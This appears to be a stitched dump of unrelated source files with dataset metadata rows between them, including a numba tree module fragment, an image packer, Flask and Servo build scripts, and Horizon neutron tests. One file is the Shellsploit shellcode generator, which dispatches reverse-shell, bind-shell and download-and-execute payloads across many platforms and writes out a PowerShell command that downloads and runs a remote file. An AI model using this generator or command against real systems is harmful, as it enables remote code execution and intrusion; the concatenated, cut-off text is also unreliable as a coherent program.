hyperplanes = np.zeros((n_nodes, hyperplane_dim), dtype=np.float32)
else:
# sparse hyperplanes
is_sparse = True
hyperplane_dim = sparse_hyperplane_dim(tree.hyperplanes)
hyperplanes = np.zeros((n_nodes, 2, hyperplane_dim), dtype=np.float32)
hyperplanes[:, 0, :] = -1
offsets = np.zeros(n_nodes, dtype=np.float32)
children = np.int32(-1) * np.ones((n_nodes, 2), dtype=np.int32)
indices = np.int32(-1) * np.ones(data_size, dtype=np.int32)
if is_sparse:
recursive_convert_sparse(
tree, hyperplanes, offsets, children, indices, 0, 0, len(tree.children) - 1
)
else:
recursive_convert(
tree, hyperplanes, offsets, children, indices, 0, 0, len(tree.children) - 1
)
return FlatTree(hyperplanes, offsets, children, indices, tree.leaf_size)
# Indices for tuple version of flat tree for pickle serialization
FLAT_TREE_HYPERPLANES = 0
FLAT_TREE_OFFSETS = 1
FLAT_TREE_CHILDREN = 2
FLAT_TREE_INDICES = 3
FLAT_TREE_LEAF_SIZE = 4
def denumbaify_tree(tree):
result = (
tree.hyperplanes,
tree.offsets,
tree.children,
tree.indices,
tree.leaf_size,
)
return result
def renumbaify_tree(tree):
result = FlatTree(
tree[FLAT_TREE_HYPERPLANES],
tree[FLAT_TREE_OFFSETS],
tree[FLAT_TREE_CHILDREN],
tree[FLAT_TREE_INDICES],
tree[FLAT_TREE_LEAF_SIZE],
)
return result
@numba.njit(
parallel=True,
locals={
"intersection": numba.int64[::1],
"result": numba.float32,
"i": numba.uint32,
},
cache=True,
)
def score_tree(tree, neighbor_indices, data, rng_state):
result = 0.0
for i in numba.prange(neighbor_indices.shape[0]):
leaf_indices = search_flat_tree(
data[i],
tree.hyperplanes,
tree.offsets,
tree.children,
tree.indices,
rng_state,
)
intersection = arr_intersect(neighbor_indices[i], leaf_indices)
result += numba.float32(intersection.shape[0] > 1)
return result / numba.float32(neighbor_indices.shape[0])
@numba.njit(nogil=True, parallel=True, locals={"node": numba.int32}, cache=True)
def score_linked_tree(tree, neighbor_indices):
result = 0.0
n_nodes = len(tree.children)
for i in numba.prange(n_nodes):
node = numba.int32(i)
left_child = tree.children[node][0]
right_child = tree.children[node][1]
if left_child == -1 and right_child == -1:
for j in range(tree.indices[node].shape[0]):
idx = tree.indices[node][j]
intersection = arr_intersect(neighbor_indices[idx], tree.indices[node])
result += numba.float32(intersection.shape[0] > 1)
return result / numba.float32(neighbor_indices.shape[0])
| bsd-2-clause | 7,960,273,991,405,806,000 | 29.507154 | 90 | 0.584736 | false |
m3pt0r/l0l | core/database/generator.py | 2 | 10276 | #------------------Bombermans Team---------------------------------#
#Author : B3mB4m
#Concat : [email protected]
#Project : https://github.com/b3mb4m/Shellsploit
#LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE
#------------------------------------------------------------------#
def generator( choose, shellcode, argv="None", argv2="None"):
if choose == "linux_x86":
if shellcode == "bin_sh":
from Linux86.bin_shx86 import bin_shx86
return bin_shx86()
elif shellcode == "exec":
from Linux86.execc import execc
return execc( argv)
elif shellcode == "read":
from Linux86.readfilex86 import readx86
from stackconvert import stackconvertSTR
return readx86( stackconvertSTR(argv))
elif shellcode == "download&exec":
from Linux86.download import downloadANDexecute
from stackconvert import stackconvertSTR
filename = argv.split("/")[-1]
return downloadANDexecute( stackconvertSTR(argv), stackconvertSTR(filename))
elif shellcode == "chmod":
from Linux86.chmod import ch
from stackconvert import stackconvertSTR
return ch( stackconvertSTR(argv))
elif shellcode == "tcp_bind":
from Linux86.tcp_bindx86 import tcp_bindx86
from stackconvert import PORT
return tcp_bindx86( PORT(argv))
elif shellcode == "reverse_tcp":
from Linux86.reverse_tcpx86 import reverse_tcpx86
from stackconvert import IP
from stackconvert import PORT
return reverse_tcpx86( IP(argv), PORT(argv2))
elif shellcode == "cd_eject":
from Linux86.cd_eject import cd_eject
return cd_eject()
elif choose == "linux_x64":
if shellcode == "bin_sh":
from Linux64.bin_shx64 import bin_shx64
return bin_shx64()
elif shellcode == "tcp_bind":
from Linux64.tcp_bindx64 import tcp_bindx64
from stackconvert import PORT
return tcp_bindx64( PORT(argv))
elif shellcode == "reverse_tcp":
from Linux64.reverse_tcpx64 import reverse_tcpx64
from stackconvert import IP
from stackconvert import PORT
return reverse_tcpx64( IP(argv), PORT(argv2))
elif shellcode == "read":
from Linux64.readfilex64 import readx64
from stackconvert import plaintext
return readx64( plaintext(argv))
elif choose == "linux":
from Linux.magic import merlin
if shellcode == "bin_sh":
from Linux86.bin_shx86 import bin_shx86
from Linux64.bin_shx64 import bin_shx64
value = hex(len(bin_shx86().split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+bin_shx86()+bin_shx64()
elif shellcode == "read":
from Linux86.readfilex86 import readx86
from Linux64.readfilex64 import readx64
from stackconvert import stackconvertSTR
from stackconvert import plaintext
value = hex(len(readx86( stackconvertSTR(argv)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+readx86( stackconvertSTR(argv))+readx64( plaintext(argv))
elif shellcode == "reverse_tcp":
from Linux64.reverse_tcpx64 import reverse_tcpx64
from Linux86.reverse_tcpx86 import reverse_tcpx86
from stackconvert import IP
from stackconvert import PORT
value = hex(len(reverse_tcpx86( IP(argv), PORT(argv2)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+reverse_tcpx86( IP(argv), PORT(argv2))+reverse_tcpx64( IP(argv), PORT(argv2))
elif shellcode == "tcp_bind":
from Linux64.tcp_bindx64 import tcp_bindx64
from Linux86.tcp_bindx86 import tcp_bindx86
from stackconvert import PORT
value = hex(len(tcp_bindx86( PORT(argv)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+tcp_bindx86( PORT(argv))+tcp_bindx64( PORT(argv))
elif choose == "osx86":
if shellcode == "tcp_bind":
from OSX86.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif shellcode == "bin_sh":
from OSX86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "reverse_tcp":
from OSX86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif choose == "osx64":
if shellcode == "bin_sh":
from OSX64.bin_sh import bin_sh
return bin_sh()
elif shellcode == "reverse_tcp":
from OSX64.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif shellcode == "tcp_bind":
from OSX64.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif choose == "freebsd_x86":
if shellcode == "bin_sh":
from FreeBSDx86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "read":
from FreeBSDx86.read import read
from stackconvert import plaintext
return read(plaintext(argv))
elif shellcode == "reverse_tcp":
from FreeBSDx86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv2), PORT(argv))
elif shellcode == "reverse_tcp2":
from FreeBSDx86.reverse_tcp2 import reverse_tcp2
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp2( IP(argv2), PORT(argv))
elif shellcode == "tcp_bind":
from FreeBSDx86.tcp_bind import tcp_bind
if len(str(argv)) == 5:
PORT = "\\x{0}\\x{1}".format(*(hex(int(argv))[2:][0:2],hex(int(argv))[2:][2:]))
else:
PORT = "\\x{0}\\x{1}".format(*("0"+hex(int(argv))[2:][0],hex(int(argv))[2:][1:]))
return tcp_bind( PORT)
elif shellcode == "exec":
from FreeBSDx86.execc import execc
from stackconvert import plaintext
command = '/bin/sh -c {0}'.format(argv)
return execc(plaintext(argv))
elif choose == "freebsd_x64":
if shellcode == "bin_sh":
from FreeBSDx64.bin_sh import bin_sh
return bin_sh()
elif shellcode == "exec":
from FreeBSDx64.execc import execc
from stackconvert import plaintext
command = '/bin/sh -c {0}'.format(argv)
return execc(plaintext(argv))
elif shellcode == "tcp_bind":
from stackconvert import plaintext
from stackconvert import PORT
from FreeBSDx64.tcp_bind import tcp_bind
return tcp_bind( PORT(argv), plaintext(argv2))
elif shellcode == "reverse_tcp":
from FreeBSDx64.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif choose == "linux_arm":
if shellcode == "chmod":
from LinuxARM.chmod import chmod
from stackconvert import plaintext
if argv == "None":
return "FILE PATH must be declared."
else:
return chmod( plaintext(argv))
elif shellcode == "bin_sh":
from LinuxARM.bin_sh import bin_sh
return bin_sh()
elif shellcode == "exec":
from LinuxARM.execc import execc
return execc( argv)
elif shellcode == "reverse_tcp":
from LinuxARM.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv2), PORT(argv))
elif choose == "linux_mips":
if shellcode == "reverse_tcp":
from LinuxMIPS.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif shellcode == "bin_sh":
from LinuxMIPS.bin_sh import bin_sh
return bin_sh()
elif shellcode == "chmod":
from LinuxMIPS.chmod import chmod
from stackconvert import plaintext
return chmod( plaintext(argv))
elif shellcode == "tcp_bind":
from LinuxMIPS.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif choose == "windows":
if shellcode == "messagebox":
from Windows import messagebox
from stackconvert import stackconvertSTR
if argv == "None":
return messagebox.messagebox( False)
else:
return messagebox.messagebox( stackconvertSTR(argv, True))
elif shellcode == "downloadandexecute":
from Windows.downloadandexecute import downANDexecute
from stackconvert import rawSTR
from stackconvert import stackconvertSTR
if argv2 == "None":
argv2 = argv.split("/")[-1]
powershell = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s') ;(New-Object -com Shell.Application).ShellExecute('%s');}"''' % (argv, argv2, argv2)
return downANDexecute(payload=stackconvertSTR(powershell))
elif shellcode == "exec":
from Windows.execc import WinExec
return WinExec(argv)
elif shellcode == "tcp_bind":
from Windows.bind_tcp import PayloadModule
return PayloadModule( argv).gen_shellcode()
elif shellcode == "reverse_tcp":
from Windows.rev_tcp import PayloadModule
return PayloadModule( argv, argv2).gen_shellcode()
elif choose == "solarisx86":
if shellcode == "read":
from Solarisx86.read import read
from stackconvert import plaintext
return read( plaintext(argv))
elif shellcode == "reverse_tcp":
from Solarisx86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
#return reverse_tcp(host=IP(argv), port=PORT(argv2))
dombili = IP(argv)
kocakari = PORT(argv2)
return reverse_tcp(host=dombili, port=kocakari)
elif shellcode == "bin_sh":
from Solarisx86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "tcp_bind":
from Solarisx86.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
| mit | -3,363,724,911,885,896,700 | 33.253333 | 201 | 0.632542 | false |
MM56/Magipack.js | examples/packImages.py | 1 | 1413 | #!/usr/bin/env python
import os, sys, getopt
import re
import json
def listFiles(path):
if not path.endswith('/'): path += '/'
files = os.listdir(path)
arr = []
for f in files:
if f.lower().endswith(('.png', '.jpg', '.jpeg', '.gif', '.webp')):
arr.append([path + f, f])
if os.path.isdir(path + '/' + f):
arr.extend(listFiles(path + f + '/'))
return arr
def packImages(files, dest, path, filename):
output = None
data = []
p = 0
c = 0
for fn in files:
f = open(fn[0], 'r').read()
l = len(f)
mimetype = 'image/'
if output == None: output = f
else: output = output + f
if fn[1][-3:] == 'jpg': mimetype += 'jpeg'
else: mimetype += fn[1][-3:]
data.append([fn[0][len(path):], p, p + l, mimetype])
p += l
c += 1
open(dest + filename + '.pack', 'w').write(output)
open(dest + filename + '.json', 'w').write(json.dumps(data))
def main():
path = dest = "."
try:
myopts, args = getopt.getopt(sys.argv[1:],"p:o:n:")
except getopt.GetoptError as e:
print (str(e))
print("Usage: %s -p <path> -o <output> -n <filename>" % sys.argv[0])
sys.exit(2)
for o, a in myopts:
if o == '-p':
path = a
elif o == '-o':
dest = a
elif o == '-n':
filename = a
if len(path) > 0 and path[-1] != '/': path = path + '/'
if len(dest) > 0 and dest[-1] != '/': dest = dest + '/'
packImages(listFiles(path), dest, path, filename)
if __name__ == "__main__":
main() | mit | -648,486,166,919,818,800 | 21.09375 | 70 | 0.550602 | false |
aravart/capomate | poolmate/test/test_api.py | 2 | 1786 | import numpy as np
import StringIO
from poolmate.teach import Runner, SVMLearner, build_options
from sklearn.datasets import make_classification
# TODO: Unneeded?
class ScikitTextLearner:
def __init__(self, scikit_learner):
self.scikit_learner = scikit_learner
def fit(self, yx):
pass
def loss(self, model):
pass
def make_example():
x, y = make_classification(n_samples=100,
n_features=20,
n_informative=2,
n_redundant=2,
n_clusters_per_class=2,
flip_y=0.01)
z = np.concatenate((np.reshape(y, (len(y), 1)), x), axis=1)
return z
def test_numpy_python_api():
z = make_example()
runner = Runner()
learner = SVMLearner(z)
options = build_options(search_budget=10,
teaching_set_size=2)
best_loss, best_set = runner.run_experiment(z, learner, options)
def test_text_python_api():
z = make_example()
runner = Runner()
learner = SVMLearner(z)
options = build_options(search_budget=10,
teaching_set_size=2)
best_loss, best_set = runner.run_experiment(z, learner, options)
def test_log_stream():
z = make_example()
runner = Runner()
learner = SVMLearner(z)
log = StringIO.StringIO()
options = build_options(search_budget=10,
teaching_set_size=2,
log=log)
best_loss, best_set = runner.run_experiment(z, learner, options)
print best_set, best_loss
# is this exactly like other api?
# no this wrapper isn't taking indices
# can we output and plot performance?
# what about doing it for text?
# document
| mit | 5,406,317,989,885,995,000 | 28.278689 | 68 | 0.577828 | false |
maurodoglio/taar | taar/flask_app.py | 1 | 2518 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import sys
from flask import Flask
from dockerflow.flask import Dockerflow
import optparse
from decouple import config
import importlib
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
app = Flask(__name__)
dockerflow = Dockerflow(app)
# Hook the application plugin and configure it
PLUGIN = config("TAAR_API_PLUGIN", default=None)
sentry_sdk.init(
dsn=config("SENTRY_DSN", ''),
integrations=[FlaskIntegration()],
)
# There should only be a single registered app for the taar-api
if PLUGIN is None:
sys.stderr.write("No plugin is defined.\n")
sys.exit(1)
# Load the function and configure the application
sys.stdout.write("Loading [{}]\n".format(PLUGIN))
plugin_module = importlib.import_module(PLUGIN)
configure_plugin = importlib.import_module(PLUGIN).configure_plugin
APP_WRAPPER = configure_plugin(app)
def flaskrun(app, default_host="127.0.0.1", default_port="8000"):
"""
Takes a flask.Flask instance and runs it. Parses
command-line flags to configure the app.
"""
# Set up the command-line options
parser = optparse.OptionParser()
parser.add_option(
"-H",
"--host",
help="Hostname of the Flask app " + "[default %s]" % default_host,
default=default_host,
)
parser.add_option(
"-P",
"--port",
help="Port for the Flask app " + "[default %s]" % default_port,
default=default_port,
)
# Two options useful for debugging purposes, but
# a bit dangerous so not exposed in the help message.
parser.add_option(
"-d", "--debug", action="store_true", dest="debug", help=optparse.SUPPRESS_HELP
)
parser.add_option(
"-p",
"--profile",
action="store_true",
dest="profile",
help=optparse.SUPPRESS_HELP,
)
options, _ = parser.parse_args()
# If the user selects the profiling option, then we need
# to do a little extra setup
if options.profile:
from werkzeug.contrib.profiler import ProfilerMiddleware
app.config["PROFILE"] = True
app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[30])
options.debug = True
app.run(debug=options.debug, host=options.host, port=int(options.port))
if __name__ == "__main__":
flaskrun(app)
| mpl-2.0 | 4,864,298,516,271,165,000 | 26.977778 | 87 | 0.664019 | false |
birryree/servo | components/style/binding_tools/regen_atoms.py | 6 | 7054 | #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import re
import os
PRELUDE = """
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
/* Autogenerated file, DO NOT EDIT DIRECTLY */
"""[1:]
def gnu_symbolify(source, ident):
return "_ZN{}{}{}{}E".format(len(source.CLASS), source.CLASS, len(ident), ident)
def msvc64_symbolify(source, ident):
return "?{}@{}@@2PEAV{}@@EA".format(ident, source.CLASS, source.TYPE)
def msvc32_symbolify(source, ident):
# Prepend "\x01" to avoid LLVM prefixing the mangled name with "_".
# See https://github.com/rust-lang/rust/issues/36097
return "\\x01?{}@{}@@2PAV{}@@A".format(ident, source.CLASS, source.TYPE)
class GkAtomSource:
PATTERN = re.compile('^GK_ATOM\((?P<ident>.+),\s*"(?P<value>.*)"\)', re.M)
FILE = "dist/include/nsGkAtomList.h"
CLASS = "nsGkAtoms"
TYPE = "nsIAtom"
class CSSPseudoElementsAtomSource:
PATTERN = re.compile('^CSS_PSEUDO_ELEMENT\((?P<ident>.+),\s*"(?P<value>.*)",', re.M)
FILE = "dist/include/nsCSSPseudoElementList.h"
CLASS = "nsCSSPseudoElements"
# NB: nsICSSPseudoElement is effectively the same as a nsIAtom, but we need
# this for MSVC name mangling.
TYPE = "nsICSSPseudoElement"
class CSSAnonBoxesAtomSource:
PATTERN = re.compile('^CSS_ANON_BOX\((?P<ident>.+),\s*"(?P<value>.*)"\)', re.M)
FILE = "dist/include/nsCSSAnonBoxList.h"
CLASS = "nsCSSAnonBoxes"
TYPE = "nsICSSAnonBoxPseudo"
class CSSPropsAtomSource:
PATTERN = re.compile('^CSS_PROP_[A-Z]+\(\s*(?P<value>[^,]+),\s*(?P<ident>[^,]+)', re.M)
FILE = "dist/include/nsCSSPropList.h"
CLASS = "nsCSSProps"
TYPE = "nsICSSProperty"
SOURCES = [
GkAtomSource,
CSSPseudoElementsAtomSource,
CSSAnonBoxesAtomSource,
CSSPropsAtomSource,
]
def map_atom(ident):
if ident in {"box", "loop", "match", "mod", "ref",
"self", "type", "use", "where", "in"}:
return ident + "_"
return ident
class Atom:
def __init__(self, source, ident, value):
self.ident = "{}_{}".format(source.CLASS, ident)
self._original_ident = ident
self.value = value
self.source = source
def cpp_class(self):
return self.source.CLASS
def gnu_symbol(self):
return gnu_symbolify(self.source, self._original_ident)
def msvc32_symbol(self):
return msvc32_symbolify(self.source, self._original_ident)
def msvc64_symbol(self):
return msvc64_symbolify(self.source, self._original_ident)
def type(self):
return self.source.TYPE
def collect_atoms(objdir):
atoms = []
for source in SOURCES:
with open(os.path.join(objdir, source.FILE)) as f:
content = f.read()
found = set()
for match in source.PATTERN.finditer(content):
ident = match.group('ident')
if ident in found:
continue
found.add(ident)
atoms.append(Atom(source, ident, match.group('value')))
return atoms
IMPORTS = ("\nuse gecko_bindings::structs::nsIAtom;"
"\nuse string_cache::Atom;\n\n")
ATOM_TEMPLATE = (" #[link_name = \"{link_name}\"]\n"
" pub static {name}: *mut {type};")
UNSAFE_STATIC = ("#[inline(always)]\n"
"pub unsafe fn atom_from_static(ptr: *mut nsIAtom) -> Atom {\n"
" Atom::from_static(ptr)\n"
"}\n\n")
CFG_IF = '''
cfg_if! {{
if #[cfg(not(target_env = "msvc"))] {{
extern {{
{gnu}
}}
}} else if #[cfg(target_pointer_width = "64")] {{
extern {{
{msvc64}
}}
}} else {{
extern {{
{msvc32}
}}
}}
}}
'''
RULE_TEMPLATE = ('("{atom}") =>\n '
'{{ '
# FIXME(bholley): Uncomment this when rust 1.14 is released.
# See the comment in components/style/lib.rs.
# ' #[allow(unsafe_code)] #[allow(unused_unsafe)] '
'unsafe {{ $crate::string_cache::atom_macro::atom_from_static'
'($crate::string_cache::atom_macro::{name} as *mut _) }}'
' }};')
MACRO = '''
#[macro_export]
macro_rules! atom {{
{}
}}
'''
def write_atom_macro(atoms, file_name):
def get_symbols(func):
return '\n'.join([ATOM_TEMPLATE.format(name=atom.ident,
link_name=func(atom),
type=atom.type()) for atom in atoms])
with open(file_name, "wb") as f:
f.write(PRELUDE)
f.write(IMPORTS)
for source in SOURCES:
if source.TYPE != "nsIAtom":
f.write("pub enum {} {{}}\n\n".format(source.TYPE))
f.write(UNSAFE_STATIC)
gnu_symbols = get_symbols(Atom.gnu_symbol)
msvc32_symbols = get_symbols(Atom.msvc32_symbol)
msvc64_symbols = get_symbols(Atom.msvc64_symbol)
f.write(CFG_IF.format(gnu=gnu_symbols, msvc32=msvc32_symbols, msvc64=msvc64_symbols))
macro_rules = [RULE_TEMPLATE.format(atom=atom.value, name=atom.ident) for atom in atoms]
f.write(MACRO.format('\n'.join(macro_rules)))
PSEUDO_ELEMENT_HEADER = """
/*
* This file contains a helper macro invocation to aid Gecko's style system
* pseudo-element integration.
*
* This file is NOT INTENDED to be compiled as a standalone module.
*
* Also, it guarantees the property that normal pseudo-elements are processed
* before anonymous boxes.
*
* Expected usage is as follows:
*
* ```
* fn have_to_use_pseudo_elements() {
* macro_rules pseudo_element! {
* ($pseudo_str_with_colon:expr, $pseudo_atom:expr, $is_anon_box:true) => {{
* // Stuff stuff stuff.
* }}
* }
* include!("path/to/helper.rs")
* }
* ```
*
*/
"""
PSEUDO_ELEMENT_MACRO_INVOCATION = """
pseudo_element!(\"{}\",
atom!(\"{}\"),
{});
"""[1:]
def write_pseudo_element_helper(atoms, target_filename):
with open(target_filename, "wb") as f:
f.write(PRELUDE)
f.write(PSEUDO_ELEMENT_HEADER)
f.write("{\n")
for atom in atoms:
if atom.type() == "nsICSSPseudoElement":
f.write(PSEUDO_ELEMENT_MACRO_INVOCATION.format(atom.value, atom.value, "false"))
elif atom.type() == "nsICSSAnonBoxPseudo":
f.write(PSEUDO_ELEMENT_MACRO_INVOCATION.format(atom.value, atom.value, "true"))
f.write("}\n")
def build(objdir, verbose=False):
atoms = collect_atoms(objdir)
write_atom_macro(atoms, "../gecko_string_cache/atom_macro.rs")
write_pseudo_element_helper(atoms, "../gecko/generated/gecko_pseudo_element_helper.rs")
return 0
| mpl-2.0 | -7,448,468,700,294,948,000 | 28.638655 | 96 | 0.58279 | false |
NeCTAR-RC/horizon | openstack_dashboard/test/unit/api/test_neutron.py | 1 | 76425 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
import netaddr
from neutronclient.common import exceptions as neutron_exc
from oslo_utils import uuidutils
import six
from django.test.utils import override_settings
from openstack_dashboard import api
from openstack_dashboard import policy
from openstack_dashboard.test import helpers as test
class NeutronApiTests(test.APIMockTestCase):
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_list(self, mock_neutronclient):
networks = {'networks': self.api_networks.list()}
subnets = {'subnets': self.api_subnets.list()}
neutronclient = mock_neutronclient.return_value
neutronclient.list_networks.return_value = networks
neutronclient.list_subnets.return_value = subnets
ret_val = api.neutron.network_list(self.request)
for n in ret_val:
self.assertIsInstance(n, api.neutron.Network)
neutronclient.list_networks.assert_called_once_with()
neutronclient.list_subnets.assert_called_once_with()
@override_settings(OPENSTACK_NEUTRON_NETWORK={
'enable_auto_allocated_network': True})
@test.create_mocks({api.neutron: ('network_list',
'subnet_list')})
def _test_network_list_for_tenant(
self, include_external,
filter_params, should_called, **extra_kwargs):
"""Convenient method to test network_list_for_tenant.
:param include_external: Passed to network_list_for_tenant.
:param filter_params: Filters passed to network_list_for_tenant
:param should_called: this argument specifies which methods
should be called. Methods in this list should be called.
Valid values are non_shared, shared, and external.
"""
filter_params = filter_params or {}
all_networks = self.networks.list()
tenant_id = '1'
tenant_networks = [n for n in all_networks
if n['tenant_id'] == tenant_id]
shared_networks = [n for n in all_networks if n['shared']]
external_networks = [n for n in all_networks if n['router:external']]
return_values = []
expected_calls = []
if 'non_shared' in should_called:
params = filter_params.copy()
params['shared'] = False
return_values.append(tenant_networks)
expected_calls.append(
mock.call(test.IsHttpRequest(), tenant_id=tenant_id, **params),
)
if 'shared' in should_called:
params = filter_params.copy()
params['shared'] = True
return_values.append(shared_networks)
expected_calls.append(
mock.call(test.IsHttpRequest(), **params),
)
if 'external' in should_called:
params = filter_params.copy()
params['router:external'] = True
return_values.append(external_networks)
expected_calls.append(
mock.call(test.IsHttpRequest(), **params),
)
self.mock_network_list.side_effect = return_values
extra_kwargs.update(filter_params)
ret_val = api.neutron.network_list_for_tenant(
self.request, tenant_id,
include_external=include_external,
**extra_kwargs)
expected = []
if 'non_shared' in should_called:
expected += tenant_networks
if 'shared' in should_called:
expected += shared_networks
if 'external' in should_called and include_external:
expected += external_networks
self.assertEqual(set(n.id for n in expected),
set(n.id for n in ret_val))
self.mock_network_list.assert_has_calls(expected_calls)
# Ensure all three types of networks are not empty. This is required
# to check 'pre_auto_allocate' network is not included.
self.assertTrue(tenant_networks)
self.assertTrue(shared_networks)
self.assertTrue(external_networks)
self.assertNotIn(api.neutron.AUTO_ALLOCATE_ID,
[n.id for n in ret_val])
def test_network_list_for_tenant(self):
self._test_network_list_for_tenant(
include_external=False, filter_params=None,
should_called=['non_shared', 'shared'])
def test_network_list_for_tenant_with_external(self):
self._test_network_list_for_tenant(
include_external=True, filter_params=None,
should_called=['non_shared', 'shared', 'external'])
def test_network_list_for_tenant_with_filters_shared_false_wo_incext(self):
self._test_network_list_for_tenant(
include_external=False, filter_params={'shared': True},
should_called=['shared'])
def test_network_list_for_tenant_with_filters_shared_true_w_incext(self):
self._test_network_list_for_tenant(
include_external=True, filter_params={'shared': True},
should_called=['shared', 'external'])
def test_network_list_for_tenant_with_filters_ext_false_wo_incext(self):
self._test_network_list_for_tenant(
include_external=False, filter_params={'router:external': False},
should_called=['non_shared', 'shared'])
def test_network_list_for_tenant_with_filters_ext_true_wo_incext(self):
self._test_network_list_for_tenant(
include_external=False, filter_params={'router:external': True},
should_called=['non_shared', 'shared'])
def test_network_list_for_tenant_with_filters_ext_false_w_incext(self):
self._test_network_list_for_tenant(
include_external=True, filter_params={'router:external': False},
should_called=['non_shared', 'shared'])
def test_network_list_for_tenant_with_filters_ext_true_w_incext(self):
self._test_network_list_for_tenant(
include_external=True, filter_params={'router:external': True},
should_called=['non_shared', 'shared', 'external'])
def test_network_list_for_tenant_with_filters_both_shared_ext(self):
# To check 'shared' filter is specified in network_list
# to look up external networks.
self._test_network_list_for_tenant(
include_external=True,
filter_params={'router:external': True, 'shared': True},
should_called=['shared', 'external'])
def test_network_list_for_tenant_with_other_filters(self):
# To check filter parameters other than shared and
# router:external are passed as expected.
self._test_network_list_for_tenant(
include_external=True,
filter_params={'router:external': True, 'shared': False,
'foo': 'bar'},
should_called=['non_shared', 'external'])
def test_network_list_for_tenant_no_pre_auto_allocate_if_net_exists(self):
self._test_network_list_for_tenant(
include_external=True, filter_params=None,
should_called=['non_shared', 'shared', 'external'],
include_pre_auto_allocate=True)
@override_settings(OPENSTACK_NEUTRON_NETWORK={
'enable_auto_allocated_network': True})
@test.create_mocks({api.neutron: ['network_list',
'is_extension_supported'],
api.nova: ['is_feature_available']})
def test_network_list_for_tenant_with_pre_auto_allocate(self):
tenant_id = '1'
self.mock_network_list.return_value = []
self.mock_is_extension_supported.return_value = True
self.mock_is_feature_available.return_value = True
ret_val = api.neutron.network_list_for_tenant(
self.request, tenant_id, include_pre_auto_allocate=True)
self.assertEqual(1, len(ret_val))
self.assertIsInstance(ret_val[0], api.neutron.PreAutoAllocateNetwork)
self.assertEqual(api.neutron.AUTO_ALLOCATE_ID, ret_val[0].id)
self.assertEqual(2, self.mock_network_list.call_count)
self.mock_network_list.assert_has_calls([
mock.call(test.IsHttpRequest(), tenant_id=tenant_id,
shared=False),
mock.call(test.IsHttpRequest(), shared=True),
])
self.mock_is_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'auto-allocated-topology')
self.mock_is_feature_available.assert_called_once_with(
test.IsHttpRequest(),
('instance_description', 'auto_allocated_network'))
@test.create_mocks({api.neutron: ['network_list']})
def test_network_list_for_tenant_no_pre_auto_allocate_if_disabled(self):
tenant_id = '1'
self.mock_network_list.return_value = []
ret_val = api.neutron.network_list_for_tenant(
self.request, tenant_id, include_pre_auto_allocate=True)
self.assertEqual(0, len(ret_val))
self.assertEqual(2, self.mock_network_list.call_count)
self.mock_network_list.assert_has_calls([
mock.call(test.IsHttpRequest(), tenant_id=tenant_id,
shared=False),
mock.call(test.IsHttpRequest(), shared=True),
])
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_get(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
subnet = {'subnet': self.api_subnets.first()}
subnetv6 = {'subnet': self.api_subnets.list()[1]}
network_id = self.api_networks.first()['id']
subnet_id = self.api_networks.first()['subnets'][0]
subnetv6_id = self.api_networks.first()['subnets'][1]
neutronclient = mock_neutronclient.return_value
neutronclient.show_network.return_value = network
neutronclient.show_subnet.side_effect = [subnet, subnetv6]
ret_val = api.neutron.network_get(self.request, network_id)
self.assertIsInstance(ret_val, api.neutron.Network)
self.assertEqual(2, len(ret_val['subnets']))
self.assertIsInstance(ret_val['subnets'][0], api.neutron.Subnet)
neutronclient.show_network.assert_called_once_with(network_id)
neutronclient.show_subnet.assert_has_calls([
mock.call(subnet_id),
mock.call(subnetv6_id),
])
@mock.patch.object(api.neutron, 'neutronclient')
def test_network_get_with_subnet_get_notfound(self, mock_neutronclient):
network = {'network': self.api_networks.first()}
network_id = self.api_networks.first()['id']
subnet_id = self.api_networks.first()['subnets'][0]
neutronclient = mock_neutronclient.return_value
